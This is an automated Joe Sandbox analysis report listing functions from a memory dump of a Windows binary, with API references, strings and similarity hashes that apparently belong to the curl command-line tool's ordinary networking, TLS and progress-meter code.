Function 00007FF7F1D9F341 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9F3BD
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9F40E

Part of subcall function 00007FF7F1D9A7AC: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000014,00000000,00007FF7F1D99BD1), ref: 00007FF7F1D9A7D7

Strings

SSL_CERT_FILE, xrefs: 00007FF7F1D9F456
CURL_CA_BUNDLE, xrefs: 00007FF7F1D9F3A6
SSL_CERT_DIR, xrefs: 00007FF7F1D9F3F7
out of memory, xrefs: 00007FF7F1D9F3DE, 00007FF7F1D9F433

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _strdup$fputs
String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory
API String ID: 4133441535-1311070097
Opcode ID: c1c9141e181f66bc0f426a4ebbf9da2df1123c3700b7bc57c219c64555e93373
Instruction ID: 657ae9fd84c2c816f2e19367dfc24b2e272ff1690c69a9196b3ee205be872fdf
Opcode Fuzzy Hash: c1c9141e181f66bc0f426a4ebbf9da2df1123c3700b7bc57c219c64555e93373
Instruction Fuzzy Hash: E7413921A09A4781EB69FB15A4502BDE7B0AF45BD0FC40031DD6D077EAEFACE84587E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9A2D4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A2F0
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A30A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A3C7

Strings

error retrieving curl library information, xrefs: 00007FF7F1D9A3AB
error initializing curl, xrefs: 00007FF7F1D9A3CF
error initializing curl library, xrefs: 00007FF7F1D9A3B4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_funcfreemalloc
String ID: error initializing curl$error initializing curl library$error retrieving curl library information
API String ID: 2771806388-2118345949
Opcode ID: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
Instruction ID: 92b09c791fae485fdf92d872b7d01951284b56fa4fe20bbd40dcd2cf74e5d8cf
Opcode Fuzzy Hash: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
Instruction Fuzzy Hash: 90318F73508B8286E308AF25D4443AC7771FB04BA4FD84234DA794B6C9EFA9E451C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB32F4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FF7F1DB3342
WSAGetLastError.WS2_32 ref: 00007FF7F1DB334C

Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB3387
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB338F

Strings

getsockname() failed with errno %d: %s, xrefs: 00007FF7F1DB3366
ssloc inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F1DB33AA

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetsocknamestrncpy
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2903212608-2605427207
Opcode ID: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
Instruction ID: 45390feafa69fafe35aaecaa5ce9885629b23fa09c9abc172803bd793a2f773a
Opcode Fuzzy Hash: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
Instruction Fuzzy Hash: 8A21AF22B1978292EB24FB15E4407EAA320BF89B85FC04034DD5E07789DFACE108C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB1CAC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF7F1DB1CCF
WSACleanup.WS2_32 ref: 00007FF7F1DB1D60

Part of subcall function 00007FF7F1DCC480: GetProcAddress.KERNELBASE ref: 00007FF7F1DCC4CF

Part of subcall function 00007FF7F1DB1D84: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DA8
Part of subcall function 00007FF7F1DB1D84: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DC4
Part of subcall function 00007FF7F1DB1D84: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DB1DD7
Part of subcall function 00007FF7F1DB1D84: LoadLibraryExA.KERNELBASE ref: 00007FF7F1DB1E22

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1D19
QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF7F1DB1D56

Strings

if_nametoindex, xrefs: 00007FF7F1DB1D0F
iphlpapi.dll, xrefs: 00007FF7F1DB1CF7

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3026270583-3097795196
Opcode ID: 55aefd5f8dc4f3212abd073bfc0803467e9b6507bb7d4d37a7080f131b7ab08f
Instruction ID: df288c919b1f4e71d82ab6eefd6deb89e4c52558a88b7fb46bf9ac7006f0cd88
Opcode Fuzzy Hash: 55aefd5f8dc4f3212abd073bfc0803467e9b6507bb7d4d37a7080f131b7ab08f
Instruction Fuzzy Hash: 0E116021A1D64392FB68F718E8053B9A3B5AF44B46FC00435D46F462D5EFACE455C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93558 Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
Part of subcall function 00007FF7F1DA3968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD

QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF7F1D93582
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7F1D9358D
GetConsoleMode.KERNELBASE ref: 00007FF7F1D935AA
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7F1D935CF
SetConsoleMode.KERNELBASE ref: 00007FF7F1D935E9
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7F1D9360A

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Console$CtrlHandleHandlerMode$AddressFrequencyModulePerformanceProcQuery
String ID:
API String ID: 3163256418-0
Opcode ID: d238add84db87b7ca8e683a0999c2dbb375ea1daa9bddb8dcb47c48b77225cdc
Instruction ID: a129d3cb1471ec94a06e2a51705f9d1fba508236be94ac4fb4a4260ea43cde19
Opcode Fuzzy Hash: d238add84db87b7ca8e683a0999c2dbb375ea1daa9bddb8dcb47c48b77225cdc
Instruction Fuzzy Hash: EF210E25A0C50366F759BB75A8451B4E771AF45726FC88235C83E422E4DFECA454C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB3614 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

connect to %s port %u failed: %s, xrefs: 00007FF7F1DB384B
After %I64dms connect time, move on!, xrefs: 00007FF7F1DB373C
Failed to connect to %s port %u after %I64d ms: %s, xrefs: 00007FF7F1DB3A8F
Connection timeout after %ld ms, xrefs: 00007FF7F1DB392C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$connect to %s port %u failed: %s
API String ID: 0-554012191
Opcode ID: 5452c60582490d62f6a2f60a2103bd731f82c82f25c552f7c5797013b93fe210
Instruction ID: 2c34c3aacba7fe5540cb11fc34342a14c307ee1768ade3034cbfabb5b3ccde2b
Opcode Fuzzy Hash: 5452c60582490d62f6a2f60a2103bd731f82c82f25c552f7c5797013b93fe210
Instruction Fuzzy Hash: E7D1F562E0878261EB10EB2994406BAA770FB45BA8F844335EE7E076D5DFBCE401D790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D91ED0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1D91F2F
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7F1D91F7D
GetConsoleScreenBufferInfo.KERNELBASE ref: 00007FF7F1D91F91

Strings

COLUMNS, xrefs: 00007FF7F1D91F0D
O, xrefs: 00007FF7F1D91FB5

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: BufferConsoleHandleInfoScreenstrtol
String ID: COLUMNS$O
API String ID: 283564500-2358961116
Opcode ID: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
Instruction ID: 5b0e88fec28e2be059f3909a9be063be9602306f47ef2bee921869b9b8ba7cad
Opcode Fuzzy Hash: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
Instruction Fuzzy Hash: FA316F33A0860586EB58AF24E444239B3B4EB54BA4F944335EA7D467D4DFBCD590C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB28E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FF7F1DB2929
WSAIoctl.WS2_32 ref: 00007FF7F1DB29AC
WSAGetLastError.WS2_32 ref: 00007FF7F1DB29B6

Strings

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00007FF7F1DB29BF
Failed to set SO_KEEPALIVE on fd %d, xrefs: 00007FF7F1DB2936

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorIoctlLastsetsockopt
String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
API String ID: 1819429192-3022933585
Opcode ID: d80fc1cefa104c438a7b93679a951798409771616211c00dff60a569a790e7f6
Instruction ID: da339849718942aba107848c656c0b1e4979ef0e5763e01c5adaa14283c25482
Opcode Fuzzy Hash: d80fc1cefa104c438a7b93679a951798409771616211c00dff60a569a790e7f6
Instruction Fuzzy Hash: B621857360868186E710DF55E0403AEF7A4FB88BD5F504139EA5E87A99DFBCD144CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9A562 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

_mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1D9A56D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A5C1

Part of subcall function 00007FF7F1D93434: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0 ref: 00007FF7F1D93474
Part of subcall function 00007FF7F1D93434: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D93483
Part of subcall function 00007FF7F1D93434: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1D934A1

Part of subcall function 00007FF7F1DA50D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,00007FF7F1D99CBC), ref: 00007FF7F1DA50F9

Strings

%s, xrefs: 00007FF7F1D9A58A
curl: (%d) Windows-specific init failed., xrefs: 00007FF7F1D9A5CA
--dump-module-paths, xrefs: 00007FF7F1D9A566

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_func$CloseCreateErrorHandleLastSnapshotToolhelp32_mbscmp
String ID: %s$--dump-module-paths$curl: (%d) Windows-specific init failed.
API String ID: 1780716894-2839915597
Opcode ID: 0fe53f441c98d8002a2398a50a46728eb4756e223cf1d0cbf20bbae4f14ae567
Instruction ID: d472a38fdb336b7ecd96ae079163b3f5d1f909516cca0665ae675bf8b650f360
Opcode Fuzzy Hash: 0fe53f441c98d8002a2398a50a46728eb4756e223cf1d0cbf20bbae4f14ae567
Instruction Fuzzy Hash: 72015B16B09A5791EB68BB16A4042B8A371AF45BC0FC58035CD3D477DAEFACF845C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC62A8 Relevance: 7.7, APIs: 5, Instructions: 240networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32 ref: 00007FF7F1DC6499
select.WS2_32 ref: 00007FF7F1DC6538
__WSAFDIsSet.WS2_32 ref: 00007FF7F1DC657B
__WSAFDIsSet.WS2_32 ref: 00007FF7F1DC65AF
__WSAFDIsSet.WS2_32 ref: 00007FF7F1DC65D1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
Instruction ID: de6621af866a824b589617737bf1815f5347a56e033a4ccc84b3dbafb6becb65
Opcode Fuzzy Hash: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
Instruction Fuzzy Hash: 25910922A1C68146EB2AAB24D4003B9E3B5FF50B98F944A34EA3D467C4DFBCD945C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAAE78 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1DAB021
__swprintf_l.LIBCMT ref: 00007FF7F1DAB168

Part of subcall function 00007FF7F1DBEFB0: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7F1DAAED4), ref: 00007FF7F1DBEFE3
Part of subcall function 00007FF7F1DBEFB0: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1DBEFEE

Strings

Connection #%ld to host %s left intact, xrefs: 00007FF7F1DAB14F
Connection cache is full, closing the oldest one, xrefs: 00007FF7F1DAB1C7

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CloseHandleObjectSingleWait__swprintf_l_time64
String ID: Connection #%ld to host %s left intact$Connection cache is full, closing the oldest one
API String ID: 2773606893-1048602531
Opcode ID: 12916fb7b50737de65a23a16587698c2ac9d0b7e1987a36af3515f9196f06169
Instruction ID: 4b29f73fc9c664c8a4a1509133a857b84513b9de270592ffc6f804652916afbd
Opcode Fuzzy Hash: 12916fb7b50737de65a23a16587698c2ac9d0b7e1987a36af3515f9196f06169
Instruction Fuzzy Hash: C2B17222A0968291EB58FB25D4503BDA3B4FB85B45F885136DE2E073D6CFBCE451C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC6B98 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 213COMMON

Download Yara Rule

APIs

fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00007FF7F1DC6EC2

Strings

%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00007FF7F1DC6E61
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00007FF7F1DC6C33
** Resuming transfer from byte position %I64d, xrefs: 00007FF7F1DC6C20

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: fflush
String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
API String ID: 497872470-664487449
Opcode ID: f1db6afceb1888d4b9d963c74150ea30138d871b5fe00a9ed913ba3e9cd6ddac
Instruction ID: 1b09b9d2268af3b2a7890ceb306231a11fcdd360b815cab437c7637e486bcd3c
Opcode Fuzzy Hash: f1db6afceb1888d4b9d963c74150ea30138d871b5fe00a9ed913ba3e9cd6ddac
Instruction Fuzzy Hash: 3491B222B04B9A81EF41EB5AE6446E9B7B8FB84BC8F810432EE1D17795DF78D541C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC58BC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 198COMMON

Download Yara Rule

APIs

inet_pton.WS2_32 ref: 00007FF7F1DC59F2
inet_pton.WS2_32 ref: 00007FF7F1DC5A28

Strings

Hostname %s was found in DNS cache, xrefs: 00007FF7F1DC5938
localhost, xrefs: 00007FF7F1DC5A73

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: inet_pton
String ID: Hostname %s was found in DNS cache$localhost
API String ID: 1350483568-3522642687
Opcode ID: 4ee8407b60bbade95cf76e8e2920379f7cc77a306ebc8ec6573fc6f92ed525ef
Instruction ID: b1d5a72205819f4dce8da18def7901ba7f19d33eab6086b5d1da72046bfac727
Opcode Fuzzy Hash: 4ee8407b60bbade95cf76e8e2920379f7cc77a306ebc8ec6573fc6f92ed525ef
Instruction Fuzzy Hash: 0781D221B0878A80FB15AB2698407B9A6B1AF45BC4F884835DD2D1B7D5DFBCE441CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCC480 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
Part of subcall function 00007FF7F1DA3968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD

Part of subcall function 00007FF7F1DB1D84: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DA8
Part of subcall function 00007FF7F1DB1D84: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DC4
Part of subcall function 00007FF7F1DB1D84: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DB1DD7
Part of subcall function 00007FF7F1DB1D84: LoadLibraryExA.KERNELBASE ref: 00007FF7F1DB1E22

GetProcAddress.KERNELBASE ref: 00007FF7F1DCC4CF

Strings

security.dll, xrefs: 00007FF7F1DCC4A9
secur32.dll, xrefs: 00007FF7F1DCC4A2
InitSecurityInterfaceA, xrefs: 00007FF7F1DCC4C5

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

